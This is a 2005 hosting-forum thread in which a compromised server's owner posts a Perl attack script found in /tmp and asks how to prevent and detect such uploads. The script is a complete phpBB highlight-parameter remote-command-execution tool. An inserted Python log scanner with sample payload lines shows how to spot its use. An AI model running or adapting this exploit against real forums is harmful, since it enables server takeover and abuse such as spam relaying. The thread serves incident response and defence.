
perl script uploaded to site

Discussion in 'Plesk for Linux - 8.x and Older' started by ElricM, Jul 3, 2005.

  1. ElricM

    ElricM Guest

    Two days ago, my site became super sluggish. I was configuring Apache and got an error that there were no available sockets, then I noticed I had almost 400,000 spam messages in the mail queue. So I rebooted the system, stopped the queue and deleted all the messages with qmail-remove. Today I found this in the /tmp directory:

    /tmp/outlaw/trash4.pl
    Code:
    use strict;
    use IO::Socket;
    
    unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }
    
    $ARGV[0] =~ m![url]http://[/url](.*?)/(.*?t=\d+)!;
    my ($server, $port) = split (/:/,$1);
    $port   = 80 unless defined($port);
    $server  = $1 unless defined($server);
    my ($url, $command) = $2;
    
    print "$server - $port - $url\n";
    
    while () {
    		print "trash4> ";
    		while(<STDIN>) {
    				$command=$_;
    				chomp($command);
    				last;
    		}
    		&send($command);
    }
    
    sub send {
        my $ok	=	0;
        my $cmd	= "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
        my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
    					"Host: $server\nPHP: $cmd\n\n\n\n";
        my $socket = IO::Socket::INET->new(PeerAddr => $server,
    				PeerPort => $port,
    				Proto    => "tcp",
    				Type     => SOCK_STREAM)
    				or die "can't connect to: $server : $@\n";
    	print $socket $string;
    	while(<$socket>) {
    		if (/#PHPBBEXPLOIT#/) {
    				close($socket) and last if $ok eq 2;
    				$ok++;
    				next;
    		}
    		print if $ok eq "1";
    	}
    }
    exit 0;
    
    How do you prevent/detect stuff like this from being uploaded and executed?
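
One way to look for use of this script against your own forum, as an added example that is not part of the original thread: the script puts PHP code in the `highlight` parameter of a viewtopic URL and carries the command in a custom `PHP:` request header, so only the parameter shows up in an Apache access log. The sketch below assumes the combined log format; the sample log lines, the function names and the suspicious-pattern list are constructed for illustration, and it also normalizes URL-encoded values, which goes beyond the unencoded request the script sends.

```python
import re
from urllib.parse import unquote

# Apache combined format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) ')
# PHP string concatenation or function calls have no place in a search term.
SUSPICIOUS = re.compile(
    r"'\s*\.|\.\s*'|\b(system|passthru|exec|shell_exec|popen|eval|getenv)\s*\(",
    re.I)

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so encoded variants compare equal."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def highlight_values(request):
    """Yield decoded values of every 'highlight' query parameter."""
    _, _, rest = request.partition(" ")
    target = rest.rsplit(" HTTP/", 1)[0]
    _, _, query = target.partition("?")
    for pair in query.split("&"):  # split before decoding, so %26 stays data
        name, _, value = pair.partition("=")
        if decode_fully(name).lower() == "highlight":
            yield decode_fully(value)

def scan(lines):
    """Return (line number, client, status, value) for suspicious requests."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in highlight_values(m.group("request")):
            if SUSPICIOUS.search(value):
                hits.append((lineno, m.group("host"), m.group("status"), value))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """
192.0.2.10 - - [03/Jul/2005:10:01:02 +0000] "GET /forum/viewtopic.php?t=12&highlight=plesk HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jul/2005:10:04:40 +0000] "GET /forum/viewtopic.php?t=12&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1" 200 812 "-" "-"
203.0.113.5 - - [03/Jul/2005:10:05:11 +0000] "GET /forum/viewtopic.php?t=12&highlight=%27.system(getenv(HTTP_PHP)).%27 HTTP/1.1" 200 790 "-" "-"
192.0.2.44 - - [03/Jul/2005:10:06:30 +0000] "GET /forum/viewtopic.php?t=9&highlight=o%27reilly HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
""".strip().splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 only shows the request was served, not that the command ran; the `#PHPBBEXPLOIT#` markers the script echoes appear in the response body, which the access log does not record.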
     
  2. EvolutionCrazy

    EvolutionCrazy Basic Pleskian

  3. ElricM

    ElricM Guest

    Thanks a bunch. Very helpful
     